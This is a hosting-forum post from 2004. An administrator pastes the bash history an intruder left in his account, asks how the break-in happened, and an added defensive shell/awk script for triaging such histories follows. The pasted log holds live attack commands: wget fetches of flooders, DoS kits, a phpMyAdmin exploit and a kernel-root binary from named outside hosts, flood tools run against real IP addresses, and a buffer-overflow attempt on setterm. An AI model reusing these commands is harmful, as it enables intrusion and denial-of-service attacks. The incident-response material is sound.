cd ....
ls
./vadimI 66.45.239.202 6005 66.45.239.20
id
./vadimI 66.45.239.202 6005 66.45.239.20
ps
./f3 201.7.10.73 1000 40
cd ....
./f3 201.7.10.73 1000 40
./vadimI 201.7.10.73 139 201.7.10.73
ps
kill 291243
kill 29124
ps
cd ...
cd ....
./f3 201.7.10.73 10000 100
ps
kill -9 29558
ps
ls
cd ....
./vadimI 200.158.190.101 2004 200.158.190.10
ls
cd ....
ls
ls -a
ps
mkdir .i
cd .i
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
ls
./f3
./f3 201.7.89.160 1000 100
ls
wget http://www.enzotech.net/code/neuter.c
ps
kill 15818
ps
w
ls
cd .i
ls
./f3 200.222.176.13 100 10
ls
cd .i
ls
./f3 200.180.52.203 200 300
./f3 200.180.52.203 1000 200
lynx
ls
lynx http://www.rootthief.com/binarys/mremap_pte
w
ls
pwd
cd ....
ls -a
mkdir ...
cd ...
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 200.140.88.186 500 300
ps
w
ls -a
pwd
mkdir .s
cd .s
wget http://www.aloysio.hpg.ig.com.br/f3
ls
ls -a
cd .s
ls
ps
kill 21493
ps
wget http://www.aloysio.hpg.ig.com.br/f3
./f3 200.228.76.178 500 180
chmod +x f3
./f3 200.228.76.178 500 180
id
cd .s
./f3 200.97.201.28 500 180
./f3 200.97.201.28 500 300
ls
ls -a
mkdir .l
cd .l
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x vadimI
./vadimI
ls
./vadimI 66.221.169.110 80 66.221.169.11
ps
kill 20441
ps
kill -9 20322
ps
kill -9 20323
ps
cd .l
ls
./vadimI 66.221.169.110 80 66.221.169.110
./vadimI 66.235.202.52 80 66.235.202.5
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
./f3
./f3 200.221.8.44 500 300
./f3 200.226.137.9 1000 300
./f3 200.223.39.2 1000 100
ls
cd .l
./vadimI
./vadimI 200.192.176.133 80 200.192.176.133
ps
kill 15811
kill -9 14844
kill -9 14845
kill -9 14844
kill -9 15535
ls
ls -a
w
tty
uname -a
ping
mkdir .k
cd .k
ls
wget http://www.luckyan.com/r00t/flood.tgz
tar xfv flood.tgz
tar xzvf flood.tgz
cd dos
ls
./slice2
chmod +x *
./slice2
cd ..
wget http://mihai-doini.org/flood.tgz
ls
rm *
wget http://mihai-doini.org/flood.tgz
tar xzvf flood.tgz
cd flood
ls
chmod +x
chmod +x *
./sl
ls
ls s*
./slice3
./sl3
./stream
ls
./xdestroy
./udp
./juno
./juno 200.222.173.87 139
./xshock
ls
./rc8
./rc8 200.222.173.87
./rc8 200.222.173.87 200.222.173.87
./s
ls
./smack
./smack 200.222.173.87
./alpha
./alpha 200.222.173.87 139 200.222.173.87
l
ls
./nestea
./da.sh
ls
ls -a
cd .k
ls
rm -rf f*
cd dos
ls
mv vadimI ..
cd ..
ls
rm -rf dos
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.188.191.131 80 200.188.191.13
./vadimI 200.188.191.131 80 200.188.191.13
./f3 200.188.191.131 1000 300
./f3 200.188.191.131 1000 300
ps
kill -9 11654
kill -9 15977
ps
./vadimI 200.208.28.224 80 200.208.28.22
ps
kill 16235
ps
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
ls
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
./f3 200.99.102.226
./f3 200.99.102.226 500 300
./f3 200.99.102.226 1000 300
./f3 200.99.102.226 1000 300
ls
ls -a
ps
setterm -file `perl -e 'print "A"x249'`
setterm
setterm -file `perl -e 'print "A"x249'`
./vadimI 66.90.122.94 6667 66.90.122.80
cd ....
./vadimI 66.90.122.94 6667 66.90.122.80
./vadimI 66.90.122.94 6667 66.90.122.80
id
ls
ls -a
cd ....
ls
wget http://nene.nu/c4
chmod +x c4
./c4
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94
./c4 -h 66.90.122.94 -p 6665,6667
cd ....
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 66.90.122.94 1000 300
ls
./vadimI 207.44.244.102 80 207.44.244.10
ps
ls
ls -a
wget eagle.kecapi.com/sec/codes/phpmy-explt.c
gcc -o phpmyphpmy-explt.c
mkdir ....
mv phpmy-explt.c ....
cd ....
ls
gcc
traceroute
ls -a
mkdir .h
ls -a
cd .h
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
ls
unzip vadimI.zip
./v
rm -rf *.zip
chmod +x *
./v
./vadimI
./f3216.239.39.10465535 600
./f3 200.152.253.20 1000 600
id
uanme -a
showmount
ls
ls -a
pwd
ps
ls
ls -a
mkdir .c
cd .c
pwd
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
rm *.zip
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
rm *.zip
chmod +x *
ls
./vadimI 24.61.211.193 80 24.61.211.19
w
ls
ps
ps
ps
ls
ls -a
mkdir .l
cd .l
wget http://packetstormsecurity.nl/DoS/udp.pl
chmod +x *
./udp.pl
./udp 200.222.175.87 139 1
./udp.pl 200.222.175.87 139 1
3ps
ps
cd ....
ls
perl udp.pl 200.222.169
ls
ls -pa
ls -a
mkdir ....
cd ....
wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl
chmod +x *
./udp.pl 201.5.121
perl udp.pl 201.5.121
ps
killall -9 perl
ps
ls
cd ....
ls
rm u*
ls
ps
killall -9 vadimI
ps
ls -a
cd ....
ls
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
rm *.zip
ls
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
ls
ls -a
cd ....
ls
./vadimI 66.90.84.99 6667 66.90.84.9


but but but, THAT IS MY ACCOUNT!!!!
How did he do this? Does he have SSH access or what? What can I do now? Disable SSH for this account; can I disable all SSH access for this account in WHM....
But I changed the password for this account....
Did he use some bad PHP/PERL script for this or what, how can I find that....?
Thanks.

Last edited by xmanxl; 07-17-2004 at 09:40 PM.
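The history posted above is the whole story of the incident in one file: reconnaissance (`uname -a`, `id`), a download, `chmod +x`, a `./` run, dot-named working directories, and kills and `rm` to clean up. The script below is an added example, not from this thread or from cPanel, that tags each line of a shell history with the indicator it carries and then looks for the download / chmod / execute chain that put the files in /tmp and /var/tmp in the first place. The sample history it ships with is constructed (placeholder host `dl.example.invalid`, documentation address 192.0.2.10, no real tool names); on a live host the functions read the account's .bash_history from stdin.

```shell
#!/bin/sh
# Added example, not from the thread: triage a shell history file the way a
# responder would read the one posted above. Each line gets a tag for the
# indicator it carries; the strongest signal is the chain
# download -> chmod +x -> ./run inside a temp or hidden directory.
# The history below is constructed (placeholder host, no real tool names).

history_sample='cd /var/tmp
uname -a
wget http://dl.example.invalid/tool.zip
unzip tool.zip
chmod +x tool
./tool
id
mkdir ....
cd ....
ls
perl udp.pl 192.0.2.10
killall -9 perl'

# tag_history [TEXT]: print "TAG<TAB>lineno<TAB>command" for every line that
# carries an indicator; unflagged lines are dropped. Reads stdin when TEXT
# is empty, so `tag_history < /home/ACCOUNT/.bash_history` works on a host.
tag_history() {
  if [ -n "$1" ]; then printf '%s\n' "$1"; else cat; fi | awk '
    function tag(t) { print t "\t" NR "\t" $0 }
    /^(wget|curl|lynx|ftp) /        { tag("DOWNLOAD"); next }    # payload fetched onto the box
    /^chmod \+x/                    { tag("CHMOD"); next }       # fetched file made executable
    /^\.\//                         { tag("EXEC_LOCAL"); next }  # run from the current directory
    /^(perl|python|sh|bash) [^ ]/   { tag("EXEC_INTERP"); next } # interpreter run: noexec does not stop this
    /^cd +\.\.?$/                   { next }                     # "cd ." and "cd .." are normal
    /^(mkdir|cd) +\.[^ ]*$/         { tag("HIDDEN_DIR"); next }  # dot-named working dirs like ".i" or "...."
    /^(id|uname|w|whoami)( |$)/     { tag("RECON"); next }       # privilege / host checks after each attempt
    /^(rm|kill|killall) /           { tag("CLEANUP"); next }     # traces and processes removed
  '
}

# staged_exec [TEXT]: print the history line number of each ./run that was
# preceded, within five lines, by chmod +x, itself within five lines of a
# download: the sequence that produced the files in /tmp and /var/tmp.
staged_exec() {
  tag_history "$1" | awk -F'\t' '
    $1 == "DOWNLOAD"                          { dl = $2 }
    $1 == "CHMOD"      && dl && $2 - dl <= 5  { ch = $2 }
    $1 == "EXEC_LOCAL" && ch && $2 - ch <= 5  { print $2; dl = ch = 0 }
  '
}

# summarize_history [TEXT]: number of flagged lines per tag, one "TAG N" per line.
summarize_history() {
  tag_history "$1" | cut -f1 | sort | uniq -c | awk '{ print $2, $1 }'
}

# count_flagged [TEXT]: total number of flagged lines.
count_flagged() { tag_history "$1" | wc -l | tr -d ' '; }

# Stand-alone use on the live host, for the account in question:
#   staged_exec       < /home/ACCOUNT/.bash_history
#   summarize_history < /home/ACCOUNT/.bash_history
```

The tags are deliberately coarse: `cd .ssh` will be flagged as a hidden directory and `rm` of a user's own file as cleanup, and the point is to give the responder a short list to read rather than a verdict. Two things the history itself teaches are built in: `cd ..` is excluded so ordinary navigation does not drown the dot-named directories, and interpreter runs get their own tag because a noexec mount stops `./tool` but not `perl udp.pl`. Note also that a history file only records what the shell saw; an attacker who unsets HISTFILE or runs commands through a web shell leaves nothing here, so an empty or truncated history is itself worth noting.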
 
  

